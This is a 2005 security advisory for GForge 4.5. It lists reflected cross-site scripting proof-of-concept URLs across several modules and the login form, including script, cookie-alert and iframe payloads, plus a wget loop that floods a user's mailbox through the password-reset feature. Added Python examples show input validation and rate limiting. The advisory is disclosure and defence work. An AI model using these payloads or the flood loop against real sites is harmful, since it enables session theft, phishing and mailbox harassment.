Network Security Vuln-Dev
Cross Site Scripting vulnerabilities in GForge

Subject: Cross Site Scripting vulnerabilities in GForge
Date: Wed, 27 Jul 2005 22:37:16 +0200
---------------------------------------------------------------------------
          Various Vulnerabilities in GForge 
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2005
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GForge - 4.5 (Current)

GForge has tools to help your team collaborate, like message forums and
mailing lists; tools to create and control access to Source Code Management
repositories like CVS and Subversion. GForge automatically creates a
repository and controls access to it depending on the role settings of the
project.

Web : http://gforge.org/

---------------------------------------------------------------------------

A) Cross Site Scripting Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1.- In the Forum Module:

        http://[target]/forum/forum.php?forum_id=";><script>alert('hi')</script>
        http://[target]/forum/forum.php?group_id=";><script>alert('hi')</script>

(NOTE: The group_id parameter is ALWAYS vulnerable.)

2.- In the Task Module:

        http://[target]/pm/task.php?func=detailtask&project_task_id=";><h1>hi!</h1>&group_id=1&group_project_id=3

3.- In the Snippets Module:

        http://[target]/snippet/detail.php?type=snippet&id=21";><iframe%20src=http://www.playboy.com></iframe><font%20size="

4.- In the search engine:

To try it, simply enter any valid XSS test string such as "><h1>hi!!!</h1> in
the search field and press enter, or try the following URL:

        http://[target]/search/?type_of_search=soft&words=%22%3E%3Ch1%3EHi%21%3C%2Fh1%3E%3Ciframe+src%3Dhttp%3A%2F%2Fslashdot.org%3E%3C%2Fiframe%3E&Search=Search

5.- In other modules:

        http://[target]//frs/admin/qrs.php?group_id=";><script>alert(document.cookie)</script>
        http://[target]/notepad.php?form=parent;%0d%0a-->%0d%0a</script><body><h1>hi!</h1></body></html><!--

NOTE: The rows, cols and wrap parameters are also vulnerable.

6.- In the Login Form:

The login form is also vulnerable to XSS (Cross Site Scripting) attacks.
This may be used to launch phishing attacks: the attacker sends an HTML
e-mail (e.g. claiming that the user needs to upgrade to the latest GForge
version because of a security problem) containing an HTML link that points
to a specially crafted URL. That URL inserts an HTML form into the GForge
login page, and when the user presses the login button, the credentials are
sent to the attacker's website.

POC. To "play" with this, simply go to the login page and enter the
following text in the login field:

        "><iframe src=http://www.playboy.com></iframe><font size="
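As an added defensive illustration (not GForge code), the following handles the reflected parameters listed above the way the advisory implies they should be: the numeric ids (group_id, forum_id, project_task_id, ...) are accepted only as plain integers, and free-text fields such as the search words are HTML-escaped before being echoed back. The parameter sets and the URLs in the test are constructed for this example.

```python
# Added example (not GForge's own code): strict validation of the numeric ids
# GForge reflects, plus HTML escaping of text fields, checked against the
# advisory's own payloads.
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed for this example: ids that must be integers, and text fields
# that may legitimately be echoed back to the user.
NUMERIC_PARAMS = {"group_id", "forum_id", "project_task_id",
                  "group_project_id", "id"}
TEXT_PARAMS = {"words", "loginname"}
_INT_RE = re.compile(r"[0-9]{1,10}")


class BadRequest(ValueError):
    """Raised when an id parameter is not a plain positive integer."""


def parse_safe_params(url: str) -> dict:
    """Return only parameters that are safe to embed in an HTML body.

    Numeric ids are accepted only if they consist of 1-10 digits; anything
    else (including the '";><script>' payloads above) is rejected outright.
    Text fields are kept but HTML-escaped so they can only render as text.
    Unknown parameters are dropped instead of being reflected.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    safe = {}
    for name, values in query.items():
        value = values[0]
        if name in NUMERIC_PARAMS:
            if not _INT_RE.fullmatch(value):
                raise BadRequest(f"parameter {name!r} must be an integer")
            safe[name] = int(value)
        elif name in TEXT_PARAMS:
            safe[name] = html.escape(value, quote=True)
    return safe


def render_search_echo(url: str) -> str:
    """Build the 'Results for ...' line the search page echoes back."""
    params = parse_safe_params(url)
    return f"<p>Results for: {params.get('words', '')}</p>"
```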

B) E-Mail Flood
~~~~~~~~~~~~~~~

The 'forgot your password?' feature allows a remote user to load a certain
URL to make the service send a validation e-mail to the specified user's
e-mail address. There is no limit on the number of messages sent over a
period of time, so a remote user can flood the target user's secondary
e-mail address (E-Mail Flood, E-Mail bomber).

The following is a "Proof Of Concept" of this vulnerability:

        [joxean@nemobox]$ while [ true ]; do
        >       wget http://[target]/account/lostpw.php?loginname=joxean
        > done

The "pending account" confirmation e-mail is also vulnerable, so a
malicious user can flood any e-mail box, even one that does not belong to a
registered GForge user.
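The missing control is a per-recipient limit on notification mail. The following is an added example (not GForge code) of a sliding-window limiter keyed on the destination address rather than the login name, since the pending-account mail can target addresses of non-users; the limits, the fake clock and the simulated wget loop are constructed for this example.

```python
# Added example (not GForge's own code): per-recipient rate limit for the
# 'lost password' and 'pending account' mails described in the advisory.
from collections import defaultdict, deque
import time


class MailRateLimiter:
    """Allow at most `limit` mails per recipient within any `window` seconds.

    Keyed on the destination address (normalised), because the advisory
    notes the pending-account mail can be aimed at any address, including
    ones that belong to no registered account.
    """

    def __init__(self, limit=3, window=3600.0, clock=time.monotonic):
        self.limit = limit
        self.window = window
        self.clock = clock  # injectable for deterministic testing
        self._sent = defaultdict(deque)  # recipient -> send timestamps

    def allow(self, recipient: str) -> bool:
        key = recipient.strip().lower()
        now = self.clock()
        stamps = self._sent[key]
        # Forget sends that have aged out of the window.
        while stamps and now - stamps[0] >= self.window:
            stamps.popleft()
        if len(stamps) >= self.limit:
            return False  # request is answered, but no mail goes out
        stamps.append(now)
        return True


def simulate_flood(requests: int, limit=3, window=3600.0) -> int:
    """Replay `requests` back-to-back lostpw.php hits against one address
    (constructed scenario) and return how many mails would be sent."""
    fake_clock = [0.0]
    limiter = MailRateLimiter(limit, window, clock=lambda: fake_clock[0])
    sent = 0
    for _ in range(requests):
        fake_clock[0] += 0.01  # ten milliseconds between wget calls
        if limiter.allow("user@example.test"):
            sent += 1
    return sent
```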


The fix:
~~~~~~~~

There is no fix at the moment.


Workarounds:
~~~~~~~~~~~~

There are no workarounds except by using a method to automagically catch
the XSS request, such as WASP (available via CVS at
https://savannah.nongnu.org/wasp) or mod_security (available at
http://www.modsecurity.org/) for Apache Web Servers.


Timeline:
~~~~~~~~~

25-Apr-2005 Vendor contacted
25-Apr-2005 Initial Vendor response (without interest on fixing bugs)
25-Apr-2005 Response to vendor
04-Jun-2005 One XSS bug (not discovered by me) closed without a fix
23-Jun-2005 Vendor RE-contacted (No response)
27-Jul-2005 Advisory released

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

---------------------------------------------------------------------------

Contact:
~~~~~~~~

        Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es


